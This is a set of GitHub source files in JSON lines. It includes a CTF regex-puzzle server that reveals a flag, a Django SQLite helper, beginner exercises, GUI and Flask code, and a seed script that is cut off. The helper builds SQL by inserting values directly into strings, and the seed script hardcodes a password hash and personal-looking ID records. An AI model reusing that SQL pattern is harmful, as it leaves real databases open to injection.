+{"seq_id":"8137321732","text":"#!/usr/local/bin/python3 -u\n\nimport re\nimport random\nfrom secret import FLAG\nimport zlib\nfrom base64 import b64decode\nimport sys\n\nHEADER = \"\"\"\n\n .___ __ /\\ __ .__ ._.\n | |/ |)/ ______ _____ _____ _____ _/ |_ ____ | |__| |\n | \\ __\\/ ___/ \\__ \\ / \\\\\\\\__ \\\\\\\\ __\\/ ___\\| | \\ |\n | || | \\___ \\ / __ \\_ | Y Y \\/ __ \\| | \\ \\___| Y \\|\n |___||__| /____ > (____ / |__|_| (____ /__| \\___ >___| /_\n \\/ \\/ \\/ \\/ \\/ \\/\\/\n\n\nPlease send me a regular expressions that matches strings of the form \"x*y+z=t\",\nwhere x, y, z and t are arbitrarily long binary numbers, and the regular expression\nmatches if and only if x*y + z = t mod 7 holds.\n\nFor example:\n- \"100*1111+101=1001\" should match because 4*15 + 5 = 9 (mod 7)\n- \"100*1111+101=100\" should not match because 4*15 + 5 != 4 (mod 7)\n\nTimeout is 120 seconds for all the tests, good luck!\n\"\"\"\nprint(HEADER)\n\ntry:\n r = zlib.decompress(b64decode(input('> '))).decode()\nexcept:\n print('An error occurred')\n exit(0)\n\nif '(?' in r:\n print('Please, do not use extensions! Only *regular* expressions are allowed.')\n exit(0)\n\nprint('Compiling...')\nr = re.compile(r)\n\np = 7\nTEST_SIZES = [4, 4, 6, 6, 8, 8, 12, 12, 16, 16, 32, 32, 64, 64]\nfor i, test_bits in enumerate(TEST_SIZES):\n x = random.randint(0, 2**test_bits)\n y = random.randint(0, 2**test_bits)\n z = random.randint(0, 2**test_bits)\n\n if i%2 == 0:\n # test matching\n t = random.randint(0, 2**test_bits) * p + ((x*y + z) % p)\n assert (x*y + z) % p == t % p\n expected_matches = True\n else:\n # test non matching\n t = random.randint(0, 2**test_bits) * p + ((x*y + z) % p) + random.randint(1, p-1)\n assert (x*y + z) % p != t % p\n expected_matches = False\n\n s = f'{bin(x)[2:]}*{bin(y)[2:]}+{bin(z)[2:]}={bin(t)[2:]}'\n\n print(f'[{i+1}/{len(TEST_SIZES)}] Testing the input \"{s}\"')\n \n matches = r.fullmatch(s) is not None\n if matches != expected_matches:\n print('Sorry, you need to match harder!')\n exit(0)\n\nprint('Congratulations! Here is the flag:', FLAG)\n\n","repo_name":"fibonhack/ifctf-2023-finals-challs","sub_path":"misc/its_a_match/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"73866823581","text":"import sys\nimport pandas as pd\nimport os\nimport sqlite3\nfrom django.conf import settings\nimport logging\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')\n\n\ndef create_logger():\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n FORMAT = '%(levelname)s %(asctime)s %(module)s %(lineno)d %(message)s'\n formatter = logging.Formatter(FORMAT)\n\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(os.path.join(settings.BASE_DIR, 'logger.log'))\n fh.setFormatter(formatter)\n fh.setLevel(logging.INFO)\n\n logger.addHandler(sh)\n logger.addHandler(fh)\n\n return logger\n\n\nlogger = create_logger()\n\n\nclass ConnectSqlite:\n def __init__(self, dbName=settings.BASE_DIR / 'db3_station.sqlite3'):\n '''\n 初始化连接\n :param dbName: 连接数据库的路径名\n '''\n\n self._conn = sqlite3.connect(dbName)\n self._cur = self._conn.cursor()\n self._time_now = '[' + sqlite3.datetime.datetime.now().strftime('%Y%m%d %H%M%S') + ']'\n\n def get_conn(self):\n return self._conn\n\n def get_cur(self):\n return self._cur\n\n def read_table(self, table_name):\n '''\n 读取表格数据\n :param table_name:\n :return: dataframe 格式数据\n '''\n sql = f'select * from {table_name}'\n df = pd.read_sql(sql, self._conn)\n return df\n\n def excel_to_table(self, read_excel_name, to_table_name, temp_folder=r\"static\\craft_temp_data\",\n header=0, index_col=None):\n # 设定读取数据源地址\n excel_path = os.path.join(settings.BASE_DIR, temp_folder, read_excel_name)\n # 读取EXCEL数据\n df1 = pd.read_excel(excel_path, header=header, index_col=index_col)\n # EXCEL数据写入数据库\n df1.to_sql(to_table_name, self._conn, if_exists='replace')\n\n def close_con(self):\n '''\n 关闭连接对象,主动调用\n :return:\n '''\n self._cur.close()\n self._conn.close()\n\n def create_table(self, sql):\n '''\n 创建表初始化\n :param sql: 建表语句\n :return: True is ok\n '''\n\n try:\n self._cur.execute(sql)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[create table error]', e)\n return False\n\n def drop_table(self, table_name):\n '''\n 删除表\n :param table_name:表名\n :return:\n '''\n\n try:\n self._cur.execute(f'drop table {table_name}')\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[drop table error]', e)\n return False\n\n def delete_table(self, sql):\n '''\n 删除表记录\n :param sql:\n :return: True or False\n '''\n\n try:\n if 'delete' in sql.lower():\n self._cur.execute(sql)\n self._conn.commit()\n return True\n else:\n print(self._time_now, '[execute sql is not delete]')\n return False\n except Exception as e:\n print(self._time_now, '[delete table error]', e)\n return False\n\n def fetchall_table(self, sql, limit_flag=True):\n '''\n 查询所有数据\n :param sql:\n :param limit_flag: False 查询一条, True查询全部\n :return:\n '''\n\n try:\n self._cur.execute(sql)\n war_msg = self._time_now + f'The [{sql}] is empty or equal None!'\n if limit_flag is True:\n r = self._cur.fetchall()\n return r if len(r) > 0 else war_msg\n elif limit_flag is False:\n r = self._cur.fetchone()\n return r if len(r) > 0 else war_msg\n except Exception as e:\n print(self._time_now, '[select table error', e)\n\n @staticmethod\n def build_sql(table_name, data, operate='update'):\n '''\n 建立sql语句字符串\n :param table_name: 表格名称\n :param data: update-字典,delete-删除条件,insert-单行数据元组\n :param operate:update, delete, insert\n :return:\n '''\n\n def right_replace(string, old, new, max_counts=1):\n '''\n 字符串从右向左替换字符,并可以指定数量,重写原replace 函数\n :param string:\n :param old:\n :param new:\n :param max_counts:\n :return:\n '''\n return string[::-1].replace(old[::-1], new[::-1], max_counts)[::-1]\n\n data_dict = data\n if operate == 'update':\n update_table = f' update {table_name} '\n\n set_col = f'set '\n for key, value in data_dict.items():\n set_col += f\" {key}='{value}', \" if key != 'index' else \" \"\n set_col = right_replace(set_col, \",\", \"\")\n\n where_condition = f\" where [index]='{data_dict['index']}' \"\n\n result_sql = update_table + set_col + where_condition\n elif operate == 'insert':\n insert_table = f\" insert into {table_name} \"\n\n cols_in = ''\n values_in = ''\n for (key, value) in data_dict.items():\n cols_in += f'{key}, ' if key != 'index' else f' [{key}], '\n values_in += f'\"{value}\", ' if key != 'index' else f' (select count([index]) from {table_name}) + 1 , '\n cols_in = right_replace(cols_in, ',', '')\n values_in = right_replace(values_in, ',', '')\n cols = f\" ({cols_in}) \"\n values = f\" ({values_in}) \"\n\n result_sql = insert_table + cols + 'values ' + values\n\n elif operate == 'delete':\n pass\n else:\n raise #参数错误\n\n\n return result_sql\n\n def insert_update_table(self, sql):\n '''\n 插入更新表格记录\n :param sql:\n sql_insert = \"insert into linetoclass values('index06', 'line06', 'class06')\"\n sql_delete = \"delete from linetoclass where [index]='index04'\"\n sql_update = \"update linetoclass set 生产线='line05', 班组='class05' where [index]='index03'\"\n :return:\n '''\n\n try:\n self._cur.execute(sql)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[insert/update table error:', e)\n return False\n\n def insert_table_many(self, sql, value):\n '''\n 插入多条记录\n :param sql: [(), ()]\n :param value:\n :return:\n '''\n\n try:\n self._cur.executemany(sql, value)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[insert many table error')\n return False\n\n\ndef set_craft_global():\n '''\n 设定 craft app 应用级别的全局变量,在settings的 templates 配置 context—processes中注册该函数\n :param request:\n :return:\n '''\n db = ConnectSqlite()\n table_list_df = db.read_table('table_list_view')\n table_list_display = table_list_df[table_list_df['is_display'] == 1]['name'].to_list()\n\n station_df = db.read_table('station_view')\n station_name_dict = dict(zip(station_df['station'], station_df['工位名称']))\n\n station_list = station_df['station'].to_list()\n craft_global = {\n 'craft_table_list': table_list_df,\n 'craft_station_list': station_list,\n 'station_name_dict': station_name_dict,\n }\n\n return craft_global\n\n\ndef suffix_view(table_name):\n '''\n add suffix 'view' end with table_name.\n 在table_name后面增加 view 后缀名,用于调用数据库中view表格,实现原始数据与应用数据的解耦\n :param table_name:\n :return:\n '''\n\n return table_name + '_view'\n\n\n# db_station = ConnectSqlite()\nif __name__ == '__main__':\n db = ConnectSqlite()\n dt = {'index':'v1', 'k2':'v2', 'k3':'v3'}\n","repo_name":"angelyhch/station_sys","sub_path":"craft/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33813570784","text":"alien_color = ['green', 'red', 'yellow']\nif 'green' in alien_color:\n\tprint('you just earned 5 points!')\n\nprint('\\n')\n\nalien_color = ['blue', 'orange', 'red', ] #this set ran through each item in the list\nfor color in alien_color:\n\tif color == 'blue':\n\t\tprint('\\nplayer earns 5 points!')\n\telse:\n\t\tprint('\\nyou just lost 589 points!')\n\nalien_colors = ['green', 'purple', 'yellow', 'brown']\nfor color in alien_colors:\n\n\tif color == 'green':\n\t\tprint(\"earned 5 points\")\n\telif color == 'purple':\n\t\tprint(\"earned 10 points\")\n\telif color == 'yellow':\n\t\tprint(\"earned 15 points\")\n\telse: \n\t\tprint(\"you need some color\")\n","repo_name":"DBerchelmann/python_crash_course","sub_path":"alien_colors.py","file_name":"alien_colors.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12435102444","text":"import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom nd2reader import ND2Reader\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas, NavigationToolbar2QT as NavigationToolbar\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QSlider, QPushButton, QHBoxLayout, QVBoxLayout, QWidget, QSizePolicy, QSpacerItem, QFileDialog, QLabel)\n\nfrom skimage import io\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\t\n # Create the central widget and set it as the main window's central widget\n central_widget = QWidget(self)\n self.setCentralWidget(central_widget)\n\n # Create a button to trigger the file browser\n self.nd2_file_button = QPushButton(\"Select nd2 image\")\n self.nd2_file_button.clicked.connect(self.openFileBrowser)\n\n # Open the file browser at the beginning\n self.image_file,_ = QFileDialog.getOpenFileName(self,\"Select nd2 image\", \"\",\"ND2 Files (*.nd2)\")\n #self.openFileBrowser()\n self.f = ND2Reader(self.image_file)\n\n # Create the figure and the canvas for the image\n self.figure_image, self.ax_image = plt.subplots(constrained_layout=True)\n self.image = self.ax_image.imshow(np.zeros((100, 100)), clim=(0, 255))\n self.ax_image.set_xticklabels([])\n self.ax_image.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n self.canvas_image = FigureCanvas(self.figure_image)\n\n toolbar = NavigationToolbar(self.canvas_image, self)\n\n\n screen_height = QApplication.primaryScreen().geometry().height()\n\n self.canvas_image.setMinimumWidth(int(screen_height*0.7))\n\n\n # Create the figure and the canvas for the plot\n self.figure_plot, self.ax_plot = plt.subplots(constrained_layout=True)\n x, y = [1,2], [2, 3]\n self.plot, = self.ax_plot.plot(x, y)\n self.canvas_plot = FigureCanvas(self.figure_plot)\n\n # Create the sliders and buttons\n self.slider1 = QSlider(Qt.Horizontal)\n self.t_slider = QSlider(Qt.Horizontal)\n #self.t_slider.valueChanged.connect(self.update_nd2)\n self.button1 = QPushButton('Update Image', self)\n self.button2 = QPushButton('Update Plot', self)\n\n # Create a button to trigger the file browser\n self.nd2_file_button = QPushButton(\"Select nd2 image\")\n self.nd2_file_button.clicked.connect(self.openFileBrowser)\n \n # Create a vertical layout for the sliders and buttons\n vbox_left = QVBoxLayout()\n vbox_left.addWidget(self.slider1)\n #vbox_left.addWidget(self.slider2)\n vbox_left.addWidget(self.button1)\n vbox_left.addWidget(self.button2)\n vbox_left.addWidget(self.nd2_file_button)\n\n #Veritcal box for image and toolbar and t slider\n vbox_image = QVBoxLayout()\n vbox_image.addWidget(self.canvas_image)\n vbox_image.addWidget(toolbar)\n vbox_image.addWidget(self.t_slider)\n\n # Create a horizontal layout to split the main window into two columns\n hbox = QHBoxLayout()\n hbox.addLayout(vbox_left)\n hbox.addLayout(vbox_image, stretch=1)\n hbox.addWidget(self.canvas_plot, stretch=1)\n #hbox.addWidget(spacer, stretch=1)\n #hbox.addStretch(1)\n\n # Use a spacer to stretch the right column horizontally\n hbox.addSpacerItem(QSpacerItem(1, 1, QSizePolicy.Expanding, QSizePolicy.Minimum))\n\n # Add the horizontal layout to the central widget\n central_widget.setLayout(hbox)\n\n # Connect the buttons to their respective functions\n self.button1.clicked.connect(self.update_nd2)\n self.button2.clicked.connect(self.update_plot)\n \n \n def update_image(self):\n # Get the values of the sliders\n if 'image_file' in dir(self):\n print('hi')\n image = io.imread(self.image_file)\n self.image.set_data(image)\n self.canvas_image.draw()\n return\n \n slider1_value = self.slider2.value()\n #slider2_value = self.slider2.value()\n\n # Generate new image data based on the slider values\n new_data = generate_image_data(slider1_value)\n # Update the image data\n self.image.set_data(new_data)\n\n # Redraw the canvas\n self.canvas_image.draw()\n \n def update_nd2(self):\n\n #vmin, vmax = self.clip.value\n #clip=self.clip.value\n #t = self.t_slider.value\n #c =self.c.value\n #v=self.v.value\n #image = self.f.get_frame_2D(v=v,c=c,t=t)\n \n #self.im.set_data(image)\n #lanes = g.get_frame_2D(v=v)\n #self.im.set_clim([vmin, vmax])\n #self.fig.canvas.draw()\n \n # if v!=self.oldv:\n # self.cyto_locator=None\n # self.update_lanes()\n \n # if self.view_nuclei.value:\n # if v!=self.oldv:\n # self.load_df(self.db_path, v)\n # self.update_tracks()\n \n \n # if self.view_cellpose.value:\n # if v!=self.oldv:\n # self.load_masks(self.outpath, v)\n \n cyto = self.f.get_frame_2D(t=self.t_slider.value())\n self.image.set_data(cyto)\n\n # Redraw the canvas\n self.canvas_image.draw()\n #self.tmarker.set_xdata(t)\n \n #self.oldv=v\n\n def update_plot(self):\n # Get the values of the sliders\n slider1_value = self.slider1.value()\n slider2_value = self.slider2.value()\n\n # Generate new plot data based on the slider values\n x, y = generate_plot_data(slider1_value, slider2_value)\n\n # Update the plot data\n self.ax.lines[0].set_xdata(x)\n self.ax.lines[0].set_ydata(y)\n\n # Update the limits of the plot\n self.ax.relim()\n self.ax.autoscale()\n\n # Redraw the canvas\n self.canvas.draw()\n \n # Create a function to open the file browser when a button is clicked\n def openFileBrowser(self):\n options = QFileDialog.Options()\n options |= QFileDialog.ReadOnly\n fileName, _ = QFileDialog.getOpenFileName(self, \"Select a file\", \"\", \"All Files (*);;Text Files (*.txt)\", options=options)\n if fileName:\n self.image_file = fileName\n pass#self.label.setText(fileName)\n\ndef generate_image_data(slider1_value):\n \n image = np.ones((100, 100))*slider1_value\n #image = io.imread(self.image_file)\n return image\n\n \nif __name__ == '__main__':\n app = QApplication([])\n window = MainWindow()\n window.show()\n app.exec_()\n","repo_name":"miguelatienza/onedcelltrack","sub_path":"onedcelltrack/gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"29053801454","text":"#!/usr/bin/env python3\nimport latticex.rosetta as rtt\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../MNIST\", one_hot=True)\ntrain_x, train_y = mnist.train.next_batch(10)\n\nprint(\"shape train_x: {}, train_y: {}\".format(train_x.shape, train_y.shape))\nrtt.activate(\"SecureNN\")\nplaceholder_x = tf.placeholder(tf.float32, [None, train_x.shape[1]])\nplaceholder_y = tf.placeholder(tf.float32, [None, train_y.shape[1]])\nw = tf.Variable(\n initial_value=tf.ones(\n shape=train_x.shape,\n dtype=tf.float32\n ),\n dtype=tf.float32,\n name=\"w_{:04d}\".format(1)\n)\nprint(\"w.shape: {}\".format(w.shape))\nassign_w = tf.assign(w, w * placeholder_x)\n\nAlice = tf.Variable(rtt.private_input(0, np.array([1000, 2000, 3000])))\nBob = tf.Variable(rtt.private_input(1, [999, 1999, 3001]))\ntest = tf.Variable(np.array([2., 3., 4.]), dtype=tf.float32)\nconst_mul_share = test * Alice\nres = tf.greater(Alice, Bob)\nprint(\"alice.shape: {}, alice.dtype: {}, test.shape: {}, test.dtype: {}\".format(\n Alice.shape, Alice.dtype, test.shape, test.dtype))\nprint(\"alice: {}\\nbob: {} \\ntest: {}\\nres: {}\\nconst_mul_var: {}\".format(Alice, Bob, test, res, const_mul_share))\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val_alice = sess.run(Alice)\n print(\"val_alice: {}\".format(val_alice))\n val_alice_plain = sess.run(rtt.SecureReveal(Alice))\n print(\"val_alice(plaintext): {}\".format(val_alice_plain))\n val_test = sess.run(test)\n print(\"val_test: {}\".format(val_test))\n val_const_mul_share = sess.run(const_mul_share)\n print(\"val_const_mul_share: {}\".format(val_const_mul_share))\n print(\"val_const_mul_share(plaintext): {}\".format(sess.run(rtt.SecureReveal(const_mul_share))))\n plain_res = sess.run(rtt.SecureReveal(res))\n print('ret:', plain_res) # ret: 1.0\n\n val_w = sess.run(w)\n print(\"w(before assign): {}\".format(val_w))\n sess.run(assign_w, feed_dict={placeholder_x : rtt.private_input(0, train_x), placeholder_y: rtt.private_input(1, train_y)})\n val_w = sess.run(w)\n print(\"w(after assign): {} w.shape: {}\".format(val_w, val_w.shape))\n\n plain_w = sess.run(rtt.SecureReveal(w))\n print(\"w(after assign): {}\".format(plain_w))\n\nrtt.deactivate()\n","repo_name":"victerying/bishe","sub_path":"test/test0.py","file_name":"test0.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23469458174","text":"a = 1 # =은 assignment라고 한다.\nb = 'python'\nc= [1, 2, 3]\n# C나 JAVA에서는 변수를 만들 때 자료형을 직접 지정해야 하지만 파이썬은\n# 변수에 저장된 값을 스스로 판단하여 자료형을 저장한다.\n#변수이름 = 변수에 저장할 값 이런 형태.\n#변수는 객체를 말한다. 객체는 지금까지 한 자료형 같은 것을 의미.\n# a = [1, 2, 3]의 경우 [1, 2, 3]값을 가지는 리스트 자료형(객체)이 자동으로 \n#메모리에 생성되고 변수 a는 [1, 2, 3]리스트가 저장된 메모리의 주소를 가리키게 됨.\na = [1, 2, 3]\nprint(id(a)) #이처럼 id(변수이름)을 통해 변수가 가리키는 메모리 주소 파악 가능.\na = [1, 2, 3]\nb = a #[1, 2, 3]리스트를 참조하는 변수가 기존에 a 하나에서 b까지 두 개로 늘어남.\n#b는 a와 완전히 동일하다 할 수 있음.\nprint(a is b) #이를 통해 a와 b가 완전히 동일하다는 것 확인가능.\na[1] = 4\nprint(a)\nprint(b)\n#그렇다면, b변수를 생성할 때 a변수의 값은 가져오되 a와는 다른 주소를 갖게 하려면?\n#두가지 방법 중 첫번째 [:]이용하기 [:]는 리스트 전체를 가리킴.\na = [1, 2, 3]\nb = a[:]\na[1] = 4\nprint(a)\nprint(b)\n#두번째 방법으로 copy모듈 이용하기\nfrom copy import copy #파이썬 모듈부분에서 자세히 다룰 예정.\na = [1, 2, 3]\nb =copy(a)\nprint(b is a)\n#리스트 자료형의 자체함수인copy함수를 사용해도 copy모듈을 사용하는 것과 동일함.\na = [1, 2, 3]\nb = a.copy()\nprint(b is a)\na, b = ('python' , 'life')\n(a, b) = 'python', 'life'#튜플은 괄호를 생략해도 된다고 했음.\n[a, b] = ['python', 'life'] #리스트도 변수로 만들 수 있음.\na = b ='python' #이처럼 여러개의 변수에 하나의 값을 저장할 수도 있음.\na = 3\nb = 5\na, b = b, a\nprint(a)\nprint(b)\n","repo_name":"seungk-new/jumptopython","sub_path":"SecondLife/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6164946536","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,redirect,HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nfrom .forms import SignUpForm\ndef signup(request):\n if request.method=='POST':\n forms=SignUpForm(request.POST)\n print(forms)\n if forms.is_valid():\n forms.save()\n return redirect('users-login')\n else:\n forms = SignUpForm()\n context={\n 'forms':forms\n }\n return render(request,'users/signup.html',context)\n@login_required\ndef profile(request):\n return render(request,'users/profile.html')\n\nfrom django.core.mail import EmailMessage\ndef send_email(request):\n em = EmailMessage('subject', 'This is test msg', to=['islomiy1101@gmail.com'])\n em.send()\n return HttpResponse('JONADI')\n\n","repo_name":"islomiy0010/blogapp","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4845418017","text":"def rotationList_Linier(lst):\n if len(lst)<2:\n return 0\n\n position =0\n while position < len(lst)-1:\n if(lst[position] > lst[position+1]):\n return (position + 1)\n position += 1\n\n\ndef count_rotations_binary(nums):\n lo = 0\n hi = len(nums) -1\n # to handle the List with no element and element without rotation\n if len(nums) < 2 or nums[0] 0 and mid_number < nums[mid-1] :\n # The middle position is the answer\n return mid\n\n elif mid_number < nums[hi] :\n # Answer lies in the left half\n hi = mid - 1\n\n elif mid_number > nums[hi]:\n # Answer lies in the right half\n lo = mid + 1\n\n return 0\n\n# 1. List has 7 element (order), and rotated 3 time\n# lst = [0 , 2, 3, 4 , 5, 6, 9, 10]\n# lst = [5, 6, 9, 10 , 0 , 2, 3, 4]\n# lst = [10 ,0 , 2, 3, 4 , 5, 6, 9]\n# lst = [2, 3, 4 , 5,6 , 9, 10 ,0 ]\n\n\nlst = []\n\nprint(rotationList_Linier(lst))\nprint(count_rotations_binary(lst))\n\n# 2. List has 10 element (Even) , adn rotate 3 time\n# 3. List rotated N Times, where N is number of element. o/p = 0\n# 4. List rotated (N-1) Times, where N is number of element. o/p = N-1\n# 5. List given is empty o/p = 0\n# 6. List may have negative number and positive number mix rotated 5 times\n\n","repo_name":"MrVivekKUMAR/04.DataStructure-and-Algorithm_Jovian.ai","sub_path":"2. Assignment1_Rotation of List.py","file_name":"2. Assignment1_Rotation of List.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38373965444","text":"from flask import request\nfrom flask_restful import Resource\n\nfrom Model import db,Assessment, Completed,CompletedSchema\nimport flask_jwt_extended\n\ncompleted_schema = CompletedSchema()\n\nclass Complete(Resource):\n @flask_jwt_extended.jwt_required\n def get(self):\n user_id = flask_jwt_extended.get_jwt_identity()[\"id\"]\n completed = Completed.query.filter_by(user_id=int(user_id)).all()\n if completed:\n result = []\n for complete in completed:\n result.append(completed_schema.dump(complete).data)\n return result,201\n else:\n return {'message': 'No paramater found.'}, 404\n\n @flask_jwt_extended.jwt_required\n def post(self):\n json_data = request.get_json(force=True)\n json_data[\"user_id\"] = flask_jwt_extended.get_jwt_identity()[\"id\"]\n if not json_data:\n return {'message': 'No input data provided'}, 400\n # Validate and deserialize input\n data, errors = completed_schema.load(json_data)\n if errors:\n return errors, 400\n print(data)\n assessment = Assessment.query.get(json_data['question_id'])\n if assessment:\n if assessment.answer == json_data[\"answer\"]:\n already_completed = Completed.query.filter_by(\n question_id=data['question_id'],user_id = data['user_id']).first()\n if already_completed:\n return {\"message\": 'Correct Answer!'}\n completed = Completed(\n question_id = data[\"question_id\"],\n user_id = data['user_id'],\n )\n completed.save()\n result = completed_schema.dump(completed).data\n\n return { \"status\": 'success', \n \"message\": 'Correct Answer!', 'data': result }, 201\n\n return {\"message\":\"Wrong Answer\"}\n \n","repo_name":"ajoyac/basilisk","sub_path":"resources/completed.py","file_name":"completed.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70291800860","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nfrom . import DiceArgs\n\nclass FunctionalDiceArgs:\n def __init__(self, func):\n if type(func).__name__ == 'function':\n self.func = func\n else:\n raise Exception('Type error: func')\n\n def to_dice_args(self, var):\n if type(var) == int:\n return DiceArgs(var, [self.func(var)])\n elif type(var) == DiceArgs:\n return DiceArgs(var.value, [self.func(var.value)])\n else:\n raise Exception('Type error: var')\n","repo_name":"k-seta/trpg-bot","sub_path":"trpg_bot/mode/args/FunctionalDiceArgs.py","file_name":"FunctionalDiceArgs.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"34320299468","text":"# Importando las herramientas necesarias para definir las rutas URL\nfrom django.urls import path\n# Importa las vistas del módulo actual\nfrom . import views\n\n# Lista de rutas URL para la aplicación\nurlpatterns = [\n # Cuando se accede a 'registro/', se redirige a la función de vista 'register_view' y tiene un nombre de ruta 'registro'\n path('registro/', views.register_view, name='registro'),\n \n # Ruta para iniciar sesión\n path('login/', views.login_view, name='login'),\n \n # Ruta de bienvenida tras iniciar sesión\n path('bienvenido/', views.bienvenido_view, name='bienvenido'),\n \n # Ruta para cerrar sesión\n path('logout/', views.logout_view, name='logout'),\n \n # Una ruta de prueba, posiblemente para propósitos de desarrollo o para una función específica\n path('prueba/', views.some_view, name='prueba'),\n \n # Una vista relacionada con una funcionalidad de \"arrastrar y soltar\" (drag and drop)\n path('drag_drop_view/', views.drag_drop_view, name='drag_drop_view'),\n \n # Una vista de bienvenida específica para usuarios invitados\n path('bienvenido_invitado/', views.bienvenido_invitado_view, name='bienvenido_invitado'),\n]\n\n","repo_name":"eduardofrancisco1733533/matlogcom","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11370290092","text":"import random\nimport names\nimport csv\nfrom django.db import IntegrityError\nfrom django.template.defaultfilters import slugify\nfrom orcamentos.utils.gen_random_values import gen_string\nfrom orcamentos.crm.models import Employee, Customer, Person, Seller, Occupation\nfrom orcamentos.proposal.models import Entry, Work\nfrom orcamentos.utils.gen_random_values import *\nfrom orcamentos.utils.gen_names import *\nfrom orcamentos.utils.lists import URGENTE, ALTA, NORMAL, BAIXA, OCCUPATION_LIST, COMPANY_LIST\n\n\n# ------------ Employee -------------------------\nhashpass = 'pbkdf2_sha256$12000$Pe4addAsDo1D$xEtHWLnSIVkEppr4pbK69SBhuLwWsSHdXyhkCZBNktA='\n\n# Primeiro verifica se existe os cargos, caso contrário os grava.\nif not Occupation.objects.all().count():\n obj = [Occupation(occupation=val) for val in OCCUPATION_LIST]\n Occupation.objects.bulk_create(obj)\n\n\ndef get_occupation(occupation_name):\n occupation = Occupation.objects.get(occupation=occupation_name)\n return occupation\n\n\nemployees = {\n 'jose': {\n 'username': 'jose',\n 'first_name': 'José',\n 'last_name': 'Carlos Frederico',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': 'sr',\n 'company': 'Bot',\n 'department': 'Vendas',\n 'cpf': '88922876699',\n 'rg': '967728378',\n 'address': 'Estrada Macacu, 1530',\n 'complement': '',\n 'district': 'Centro',\n 'city': 'São Paulo',\n 'uf': 'SP',\n 'cep': '01627400'},\n 'regis': {\n 'username': 'regis',\n 'first_name': 'Regis',\n 'last_name': 'da Silva Santos',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': '',\n 'company': 'RG Solutions',\n 'department': 'TI',\n 'cpf': '15895419181',\n 'rg': '305467840',\n 'address': 'Praça Otaviano de Paulo, 89',\n 'complement': 'Apto 44',\n 'district': 'Pompéia',\n 'city': 'São Paulo',\n 'uf': 'SP',\n 'cep': '01727389'},\n 'adailton': {\n 'username': 'adailton',\n 'first_name': 'Adailton',\n 'last_name': 'do Nascimento',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': '',\n 'company': 'RG Solutions',\n 'department': 'TI',\n 'cpf': '41895976210',\n 'rg': '535121673',\n 'address': 'Rua Jaqueira, 460',\n 'complement': '',\n 'district': 'Santo Antonio',\n 'city': 'Aparecida de Goiânia',\n 'uf': 'GO',\n 'cep': '10282900'}\n}\n\n\nfor k in employees:\n slug = slugify('{} {}'.format(\n employees[k]['first_name'], employees[k]['last_name']))\n Employee.objects.create(\n username=employees[k]['username'],\n first_name=employees[k]['first_name'],\n last_name=employees[k]['last_name'],\n slug=slug,\n email=employees[k]['username'] + '@example.com',\n is_staff=True,\n password=hashpass,\n occupation=get_occupation(employees[k]['occupation']),\n gender=employees[k]['gender'],\n treatment=employees[k]['treatment'],\n company=employees[k]['company'],\n department=employees[k]['department'],\n cpf=employees[k]['cpf'],\n rg=employees[k]['rg'],\n address=employees[k]['address'],\n complement=employees[k]['complement'],\n district=employees[k]['district'],\n city=employees[k]['city'],\n uf=employees[k]['uf'],\n cep=employees[k]['cep'],\n )\n\n# ------------ Work -------------------------\ncustomer_list = []\nwork_list = []\naddress_list = []\n\n''' Lendo os dados de obras_.csv '''\nwith open('fix/obras_.csv', 'r') as f:\n r = 